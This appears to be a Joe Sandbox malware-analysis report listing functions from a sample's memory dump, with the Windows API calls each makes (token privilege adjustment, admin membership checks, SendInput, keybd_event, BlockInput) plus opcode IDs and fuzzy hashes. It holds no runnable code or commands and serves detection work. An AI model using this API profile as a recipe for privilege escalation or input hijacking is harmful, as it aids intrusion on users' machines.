Function 007016C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 006BFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 006C0668
Part of subcall function 006BFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 006C0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0070170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0070173A
GetLastError.KERNEL32 ref: 0070174A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: f7bc4d627b391589d0e16ed224c204c61e67137e90c5ee37489bd426b08f56dd
Instruction ID: c20e52b808bc765f376d7aee92f599ec042f5bb52a514c3adfb35487246663b1
Opcode Fuzzy Hash: f7bc4d627b391589d0e16ed224c204c61e67137e90c5ee37489bd426b08f56dd
Instruction Fuzzy Hash: D611CEB2400304EFE718AF54DC86DAAB7F9EF04714B20862EE05653291EB75FC818B24

Function 0070D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0070D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0070D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0070D650

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: f0ab25f5df96f83bfbfce2293abae31f90fa59c2f773f4798e8c491f971c77a2
Instruction ID: e9707ec8740eb557732030d41d2a22dde7409bb384ad1c28fa7e1104e7f4a313
Opcode Fuzzy Hash: f0ab25f5df96f83bfbfce2293abae31f90fa59c2f773f4798e8c491f971c77a2
Instruction Fuzzy Hash: 07113C75E05228BBEB218F959C45FAFBBBCEB45B50F108115F904E7290D6744A058BA1

Function 00701663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0070168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007016A1
FreeSid.ADVAPI32(?), ref: 007016B1

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 2c4a971b46f591e69d2ab05b887dd78da1dded3b6fb54cbc138405cfa4aa39b5
Instruction ID: 452b0e85089ff896b44f52b8a94e1dcf1ad64072683e0569eae5b810ff8ce9de
Opcode Fuzzy Hash: 2c4a971b46f591e69d2ab05b887dd78da1dded3b6fb54cbc138405cfa4aa39b5
Instruction Fuzzy Hash: 85F0F47195030DFBEB00DFE49D89AAEBBBCEB08705F508565E601E2181E778AA448B54

Function 006C4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(006D28E9,?,006C4CBE,006D28E9,007688B8,0000000C,006C4E15,006D28E9,00000002,00000000,?,006D28E9), ref: 006C4D09
TerminateProcess.KERNEL32(00000000,?,006C4CBE,006D28E9,007688B8,0000000C,006C4E15,006D28E9,00000002,00000000,?,006D28E9), ref: 006C4D10
ExitProcess.KERNEL32 ref: 006C4D22

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b4c59affcc6aea63764ef6c43d89e639ddf5b164e1c03de4d4f490dd340bfd2d
Instruction ID: fac4cfefb995b5db96842d5655a92f12fd2bffe5817c434e8b2ccf7f6a35c7e3
Opcode Fuzzy Hash: b4c59affcc6aea63764ef6c43d89e639ddf5b164e1c03de4d4f490dd340bfd2d
Instruction Fuzzy Hash: 49E0BF31400148ABDF12BF54DD19F983B6AEF41752B108418FC059A222CB39ED51DB45

Function 006DC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 006DC36C

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: b2b5a3698079203754dcaad065da7ee16d7074f619b764fc621feda29b49b144
Instruction ID: 0654882f93841b4802c39e36e9e0476024e8b2a3d98a01bda4daad49019059f8
Opcode Fuzzy Hash: b2b5a3698079203754dcaad065da7ee16d7074f619b764fc621feda29b49b144
Instruction Fuzzy Hash: 8B41077690021A6BCB249FB9CC49DFB77BAEB84324F10426EF905D7380E6719E41CB54

Function 006FD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 006FD28C

Strings

X64, xrefs: 006FD2A8

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 2e77ff26d8f6f15d6b1e20184bce4ef7e60c9ae3a00ca8495e59fc507fdd9ad3
Instruction ID: b151787dcd9bd1ad6c5a9df3371e56b2e43566d6f370f890789566abfb20119d
Opcode Fuzzy Hash: 2e77ff26d8f6f15d6b1e20184bce4ef7e60c9ae3a00ca8495e59fc507fdd9ad3
Instruction Fuzzy Hash: 89D0C9B480111DEACB94DB90DC88DE9B37DBB04305F104151F206A2000D73496498F10

Function 006CCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 72eaf6ead7c1603456a45eb2c977c0f47fd97d4780100a44f883ebf7a141a2bf
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: B7020C71E012199BDF14CFA9C980BEDBBF2EF49324F25416ED819EB384D731A9418B94

Function 006ACAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#w, xrefs: 006ACF7F
Variable is not of type 'Object'., xrefs: 006F0C40

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#w
API String ID: 0-2679264178
Opcode ID: 2c5a0f85ad0111f110e0e385abd1edce5ecab1afe3ca00df33b671e31c64a381
Instruction ID: 0c9a68b88ca0f5154dd059afdb191f21e4326c43340447c7b23a2f1340fd916d
Opcode Fuzzy Hash: 2c5a0f85ad0111f110e0e385abd1edce5ecab1afe3ca00df33b671e31c64a381
Instruction Fuzzy Hash: 17326970900218DFDF14EF94C995AEDB7B6BF06324F148059E906AB292DB35AE46CF60

Function 007168EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00716918
FindClose.KERNEL32(00000000), ref: 00716961

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f65f3ac495206ccc31e70c04708f3f1ff71a792dfe051bef7d1075e438a91a82
Instruction ID: b06c61a7e56c3c22db5e93c8e9d760f5784ee82298e4b73481c8058d18c9d44d
Opcode Fuzzy Hash: f65f3ac495206ccc31e70c04708f3f1ff71a792dfe051bef7d1075e438a91a82
Instruction Fuzzy Hash: 1F1190716042109FD710DF29D885A16BBE5FF85329F14C69DE8698F2A2CB34EC45CB91

Function 007137B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00724891,?,?,00000035,?), ref: 007137E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00724891,?,?,00000035,?), ref: 007137F4

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: a929d41310605d2ba7665b5be4b1a90fab1dc715931689351338866de993c8d7
Instruction ID: 96491131d07fb1520261e7f0fae0a04a081202817b39aaa5b30cd65bf441ee64
Opcode Fuzzy Hash: a929d41310605d2ba7665b5be4b1a90fab1dc715931689351338866de993c8d7
Instruction Fuzzy Hash: FCF0E5B16053282AE760276A8C8DFEB3AAEEFC5761F004275F509E22C1D9709D44C7B4

Function 0070B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0070B25D
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 0070B270

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: fd2ca1d65edf3dc9069eb025b35a631d65bb6cdbcd695eb82fbe924a478f57ce
Instruction ID: aea4b074a3ac3f04c0e0650a50bcba916b325783939dd3fc987f196e21198a65
Opcode Fuzzy Hash: fd2ca1d65edf3dc9069eb025b35a631d65bb6cdbcd695eb82fbe924a478f57ce
Instruction Fuzzy Hash: A8F01D7180424DEBEB059FA0C805BAE7BB4FF08305F108009F955A5191C37D86119F94

Function 007010BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007011FC), ref: 007010D4
CloseHandle.KERNEL32(?,?,007011FC), ref: 007010E9

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 03db9b46f124d182c3d1ba37505a9c8f8aa047bc9081ec0adf57d5dd3516253b
Instruction ID: d1970fe0007bf09ca353169a7f71f05e2a11eab8476e86f5b4c2025cab291ea5
Opcode Fuzzy Hash: 03db9b46f124d182c3d1ba37505a9c8f8aa047bc9081ec0adf57d5dd3516253b
Instruction Fuzzy Hash: CEE04F72004610EEF7262B11FC05EB377E9EF04311B10C82DF4A5804B1DB62ACE0DB14

Function 006D676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,006D6766,?,?,00000008,?,?,006DFEFE,00000000), ref: 006D6998

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ddcedb095aeb0ef60ac9231020b314afc5eeb7427af04a027011a2a3798c3466
Instruction ID: d0a71075a0ecf798b2b420c7de3f02319666d723476ece573864ebbc95f7c385
Opcode Fuzzy Hash: ddcedb095aeb0ef60ac9231020b314afc5eeb7427af04a027011a2a3798c3466
Instruction Fuzzy Hash: F3B14A31A106099FD715CF28C486BA57BA1FF45364F298659F8DACF3A2C335E982CB40

Function 006BB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 006F851F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f46b6157c0091ee5cde96481e191aca1e8a21aced17f0ece02adb74db63867c7
Instruction ID: 30eec812021445e9a54589fea8b8cae271ff40b11545dabfc65b7bcdcf654dc2
Opcode Fuzzy Hash: f46b6157c0091ee5cde96481e191aca1e8a21aced17f0ece02adb74db63867c7
Instruction Fuzzy Hash: 9B125FB19002299FDB24CF58C8816FEB7F6FF48710F14819AE949EB255DB749E81CB90

Function 0071EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0071EABD

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: ac01eeeefabd1401c3713fdfc4ec20ab6df57f6da4cd1b45d7c80c86f96b2cc8
Instruction ID: 8d7cd00b27e34f0cb1a17a3fe9467e9360fcde8ff90bd3359aa24dc2d269bf34
Opcode Fuzzy Hash: ac01eeeefabd1401c3713fdfc4ec20ab6df57f6da4cd1b45d7c80c86f96b2cc8
Instruction Fuzzy Hash: D8E01A322002049FD710EF69D805E9AB7EAAF99760F00C41AFC4AD7291DA74AD808B95

Function 006C09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,006C03EE), ref: 006C09DA

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e9c28ee0c7d165eaa02debb27d5a68882d7979bc194400c306419d8c266f7029
Instruction ID: bbf3de48b4daf82a1d0eb86bcc1ff413850e7a831aafda678fb063d6ba0d5c7a
Opcode Fuzzy Hash: e9c28ee0c7d165eaa02debb27d5a68882d7979bc194400c306419d8c266f7029
Instruction Fuzzy Hash:

Function 006C781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 006C798B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: e9869f0305de4cde637479190e0cfd137c9e1741ec8b51daf3f9451e1ccc4672
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: B6518B7160D7055BDF388569885EFFE239BDB12340F18052EEA86D7382CA25DE02DF5A

Function 00712046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&w, xrefs: 00712053

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID: 0&w
API String ID: 0-3600112441
Opcode ID: 02d88282c74e9cdf9a2aa29203081d3c0f911b59a042ad3464585cbc30f26229
Instruction ID: 722fce28e28ccdffea9497a4a1e9b60edb20f85bab1a84d4b3cf3b066a3aa9a1
Opcode Fuzzy Hash: 02d88282c74e9cdf9a2aa29203081d3c0f911b59a042ad3464585cbc30f26229
Instruction Fuzzy Hash: 3521A8326205118BD728CF79C8226BA73E5E754310F15862EE4A7C37D1DE39A945C784

Function 006D6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a845e73adcc7a6d770a4b77b1f2612f5410a9588099e745f87c9287e6b76daa
Instruction ID: b9446510386943831da2af279f1495a6b48643853e7cd4f00f5e73fb7f55bc5e
Opcode Fuzzy Hash: 4a845e73adcc7a6d770a4b77b1f2612f5410a9588099e745f87c9287e6b76daa
Instruction Fuzzy Hash: 84324626D29F014DD7239634DC22335A28AAFB73C5F55C737F81AB5AAAEF29C4834101

Function 006BCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90ce433e64d9b19807ce6f81719c9419b187f166a4f54acf354cd7eecd306c1d
Instruction ID: 07195f7c8cd3fd1ffb198e51c55e2fdf2caa1c8ea2231ebf9fd16c5c88119776
Opcode Fuzzy Hash: 90ce433e64d9b19807ce6f81719c9419b187f166a4f54acf354cd7eecd306c1d
Instruction Fuzzy Hash: 4832F371A0411D8BDF28CB29C6946FD7BA3EB45330F28856AD65ACB395D334DE82DB40

